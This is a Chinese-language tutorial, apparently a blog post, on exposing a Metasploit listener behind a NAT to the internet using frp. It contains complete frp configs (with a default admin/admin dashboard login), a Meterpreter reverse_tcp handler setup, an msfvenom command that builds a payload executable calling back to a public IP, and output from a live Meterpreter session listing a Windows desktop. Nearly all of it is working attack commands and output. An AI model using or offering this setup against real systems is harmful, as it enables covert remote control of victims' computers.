内网Metasploit映射到外网

下载frp

Github项目地址:https://github.com/fatedier/frp

找到最新的releases下载，系统版本自行确认。

下载方法：

wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz
tar zxvf frp_0.16.1_linux_amd64.tar.gz 
cd frp_0.16.1_linux_amd64

公网服务器配置：

修改配置文件：

[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ vim frps.ini 
[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin

启动服务：

[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ nohup ./frps -c frps.ini > log.txt &

kali linux 配置：

修改配置文件：

kali@kali:~/frp_0.16.1_linux_amd64$ vim frpc.ini 
[common]
server_addr = xx.xx.xx.xx
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 4446

启动服务：

kali@kali:~/frp_0.16.1_linux_amd64$ nohup ./frpc -c frpc.ini > log.txt &

metasploit配置：

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 6666
lport => 6666

生成payload文件：

e2a5e@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=34.80.29.48 lport=4446 -f exe -o test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: test.exe

执行payload文件，测试效果：

msf5 exploit(multi/handler) > exploit 

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:6666 
[*] Sending stage (206403 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:6666 -> 127.0.0.1:35992) at 2019-09-03 17:05:39 +0800

meterpreter > ls
Listing: C:\Users\win7\Desktop
==============================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  2309      fil   2019-08-30 11:12:41 +0800  Google Chrome.lnk
100777/rwxrwxrwx  10916080  fil   2019-08-30 11:57:01 +0800  PCHunter64.exe
40777/rwxrwxrwx   0         dir   2019-09-03 16:12:02 +0800  PanDownload
100666/rw-rw-rw-  282       fil   2018-09-11 09:18:55 +0800  desktop.ini
100777/rwxrwxrwx  7168      fil   2019-09-03 16:39:18 +0800  test.exe

meterpreter >